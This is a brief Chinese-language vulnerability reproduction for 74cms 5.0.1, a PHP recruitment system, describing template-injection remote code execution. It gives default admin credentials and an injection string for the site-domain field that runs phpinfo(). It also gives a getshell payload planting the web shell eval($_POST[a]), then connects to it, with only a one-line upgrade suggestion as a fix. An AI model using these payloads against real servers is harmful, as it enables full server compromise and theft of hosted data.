漏洞描述:
迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。
74cms version 5.0.1 存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。
漏洞利用条件:
/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程代码执行
漏洞影响范围:
74cms version 5.0.1
漏洞复现:
- /index.php?m=Admin 访问后台,adminadmin/adminadmin登录后台:
2.在网站域名中填写/.',phpinfo(),'/.com然后保存,刷新当前页面,返回phpinfo页面:
3.Getshell:在网站域名输入/.',eval($_POST[a]),'/.com,保存刷新:
4.连接木马:
修复建议:
1.关注厂商,升级版本